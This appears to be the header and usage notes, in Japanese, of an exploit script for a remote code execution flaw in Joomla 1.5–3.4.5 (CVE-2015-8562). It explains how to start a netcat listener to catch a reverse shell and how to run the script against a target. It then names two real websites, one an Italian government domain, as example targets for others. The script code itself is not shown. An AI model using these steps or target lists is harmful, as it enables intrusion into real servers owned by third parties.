
Joomla 1.5 - 3.4.5 オブジェクトインジェクション RCE X-Forwarded-For ヘッダー
エクスプロイト: Joomla 1.5 - 3.4.5 オブジェクトインジェクション RCE X-Forwarded-For ヘッダー:
脆弱性発見日: 2015年12月17日
エクスプロイト作成者: anarc0der
バージョン: Joomla 1.5 から 3.4.5
CVE : CVE-2015-8562
使用方法:
ターミナルを1つ開き、ncで待ち受けます: $ nc -lnvp 4444
別のターミナルを開き、エクスプロイトを実行します:
python3 rce.py --target='target' --ip='ip' --port=4444
PoCのターゲット例(他の人が参考として使用するため、これらに迷惑をかけないでください):
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/